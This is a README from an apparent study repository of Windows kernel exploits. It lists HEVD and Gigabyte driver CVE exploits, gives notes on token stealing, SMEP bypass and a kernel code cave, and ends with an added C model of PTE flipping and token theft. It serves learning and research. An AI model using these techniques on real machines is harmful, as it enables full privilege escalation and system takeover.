xct/windows-kernel-exploits
Windows-Exploits

Some kernel exploits I used to learn about the topic, mainly for OSEE. These probably contain code snippets from other exploits - if I missed references/authors please send me a message and I'll add them.

Kernel

HEVD

Most exploits are vs. Win10 1909 x64, targeting https://github.com/hacksysteam/HackSysExtremeVulnerableDriver .

  • StackOverflow (Medium Integrity)
  • StackOverflow Data Only (ROP/PreviousMode Overwrite, Medium Integrity)
  • StackOverflow with GS (Medium Integrity)
  • TypeConfusion (Medium Integrity)
  • TypeConfusion with StackPivot (Medium Integrity)
  • Use-After-Free (Medium Integrity)
  • Pool Overflow Win7 x64 with ProcessBilled Overwrite (Medium Integrity)
  • NullPtr Dereference Win7 x64 (Medium Integrity)

Misc Drivers

All exploits are vs. Win10 1909 x64.

  • CVE-2018-19320 (Gigabyte Driver, Medium Integrity)
  • CVE-2018-19320 + CVE-2018-19323 (Gigabyte Driver, Low Integrity)

Notes/Misc

  • KUSER_SHARED_DATA is mapped at the fixed kernel address 0xFFFFF78000000000 (not randomized by KASLR); the unused tail at offset 0x800 (0xFFFFF78000000800) is writable and, on the builds targeted here, executable, so it serves as a code cave for kernel shellcode. Newer Windows builds mark the page non-executable, so check its PTE before relying on it.
  • Ways to SYSTEM: steal a token (copy the System process Token into the current EPROCESS), overwrite HalDispatchTable[1] (or another rarely used function pointer) with a pointer to shellcode and trigger it from user mode (e.g. via NtQueryIntervalProfile), or edit the DACL of a privileged process so the attacker's process can open it with full access.
  • Ways to make a page RW/RX: for kernel pages flip the relevant PTE bit (the same mechanism as the U/S flip, but clearing NX); for user-mode pages use VirtualProtect/VirtualAlloc with PAGE_EXECUTE_READWRITE or WriteProcessMemory.
  • Bypass SMEP: ROP to a `mov cr4, reg` gadget and clear bit 20 (SMEP) of CR4, then return into user-mode shellcode; or clear the U/S bit in the PTE of the user page holding the shellcode so the CPU treats it as a supervisor page; or write the shellcode into kernel memory (e.g. the KUSER_SHARED_DATA cave), using the same PTE trick to fix up protections. Caveat: with VBS/HVCI enabled the hypervisor pins CR4.SMEP and enforces W^X via SLAT, so the CR4 route does not work there.
  • kCFG (kernel Control Flow Guard) is only enforced when VBS/HVCI (Hyper-V) is enabled; without it the indirect-call checks are effectively no-ops, which is why overwriting a function pointer with a pointer to shellcode still works on these targets.
  • Dangerous functions to look for in drivers: MmMapIoSpace (maps arbitrary physical memory), __readmsr/__writemsr (MSR access, e.g. IA32_LSTAR), memmove/memcpy/RtlCopyMemory with user-controlled pointers or sizes, and METHOD_NEITHER IOCTL handlers that touch user buffers without ProbeForRead/ProbeForWrite.
  • Compile shellcode: nasm -f bin shellcode.asm -o shellcode.bin, then dump the bytes as a C array with radare2 -b 64 -c 'pc' ./shellcode.bin (-b 32 for 32-bit shellcode).
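As an added example (mine, not code from the xct/windows-kernel-exploits repository or from HEVD), the arithmetic behind three of the notes above in plain C that runs on any host: the PTE address computation used for the U/S and NX flips, the CR4 value a SMEP-disabling ROP chain loads, and a host-side model of the token-stealing walk through ActiveProcessLinks. Assumptions: the PTE base 0xFFFFF68000000000 is the classic non-randomized value used only for the demo (on Win10 1607+ read it from nt!MiGetPteAddress at runtime), the EPROCESS offsets are the public Win10 1909 x64 values, and the three-process ring with its PIDs and token values is constructed.

```c
/* Added example, not part of the original repo. Nothing here touches a real
 * kernel: the PTE base, the CR4 value and the EPROCESS ring are constructed. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* x64 page table entry bits used by the U/S and NX tricks. */
#define PTE_US   (1ULL << 2)    /* 1 = user page; SMEP only blocks fetches from these */
#define PTE_NX   (1ULL << 63)   /* 1 = no execute */
#define CR4_SMEP (1ULL << 20)   /* the "20th bit of CR4" from the notes */

/* Classic fixed PTE base; assumption for the demo (randomized since Win10 1607). */
#define PTE_BASE_DEMO 0xFFFFF68000000000ULL

/* Same arithmetic as nt!MiGetPteAddress: index the PTE array by VA >> 12. */
uint64_t pte_address(uint64_t pte_base, uint64_t va)
{
    return pte_base + ((va >> 9) & 0x7FFFFFFFF8ULL);
}

/* Make a user page look like a kernel page (clear U/S) and executable (clear NX). */
uint64_t pte_make_kernel_exec(uint64_t pte)
{
    return pte & ~PTE_US & ~PTE_NX;
}

/* Value a "mov cr4, rax" ROP gadget should load to switch SMEP off. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~CR4_SMEP;
}

/* Win10 1909 x64 (build 18363) _EPROCESS field offsets. */
#define EP_UNIQUEPROCESSID 0x2E8
#define EP_ACTIVELINKS     0x2F0
#define EP_TOKEN           0x360
#define EP_SIZE            0x400   /* covers the fields above; the real struct is larger */

/* Token stealing: walk ActiveProcessLinks from the current EPROCESS until the
 * System process (PID 4) is found, then copy its Token over our own.
 * Real shellcode finds 'self' via gs:[0x188] -> KTHREAD.ApcState.Process;
 * here the caller hands it in. */
void steal_system_token(uint8_t *self)
{
    uint8_t *cur = self;
    for (;;) {
        /* LIST_ENTRY.Flink points at the next process's ActiveProcessLinks field. */
        uint8_t *flink = *(uint8_t **)(cur + EP_ACTIVELINKS);
        cur = flink - EP_ACTIVELINKS;
        if (*(uint64_t *)(cur + EP_UNIQUEPROCESSID) == 4)
            break;
        if (cur == self)            /* full circle without finding System: give up */
            return;
    }
    /* Token is an EX_FAST_REF; simple shellcode copies the whole value, refcount bits included. */
    memcpy(self + EP_TOKEN, cur + EP_TOKEN, sizeof(uint64_t));
}

/* Constructed ring: System (PID 4) -> our process (1234) -> another (5678) -> System. */
uint64_t demo_token_steal(void)
{
    static uint8_t procs[3][EP_SIZE];
    uint64_t pids[3]   = { 4, 1234, 5678 };
    uint64_t tokens[3] = { 0xFFFF8A0012345006ULL, 0xFFFF8A00AAAAAAA9ULL, 0xFFFF8A00BBBBBBB1ULL };
    for (int i = 0; i < 3; i++) {
        memset(procs[i], 0, EP_SIZE);
        *(uint64_t *)(procs[i] + EP_UNIQUEPROCESSID) = pids[i];
        *(uint64_t *)(procs[i] + EP_TOKEN) = tokens[i];
        *(uint8_t **)(procs[i] + EP_ACTIVELINKS)     = procs[(i + 1) % 3] + EP_ACTIVELINKS; /* Flink */
        *(uint8_t **)(procs[i] + EP_ACTIVELINKS + 8) = procs[(i + 2) % 3] + EP_ACTIVELINKS; /* Blink */
    }
    steal_system_token(procs[1]);
    return *(uint64_t *)(procs[1] + EP_TOKEN);
}

int main(void)
{
    uint64_t sc = 0x401000ULL;   /* constructed user-mode shellcode address */
    printf("PTE for %#llx: %#llx\n", (unsigned long long)sc,
           (unsigned long long)pte_address(PTE_BASE_DEMO, sc));
    printf("PTE 0x8000000012345867 -> %#llx\n",
           (unsigned long long)pte_make_kernel_exec(0x8000000012345867ULL));
    printf("CR4 0x370678 -> %#llx\n", (unsigned long long)cr4_without_smep(0x370678ULL));
    printf("token after steal: %#llx\n", (unsigned long long)demo_token_steal());
    return 0;
}
```

In a real chain the arbitrary write primitive from the driver bug would be pointed at the result of `pte_address` to apply `pte_make_kernel_exec`, and the token copy would run as position-independent shellcode rather than C; the walk and the bit positions are what carry over unchanged.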

Resources
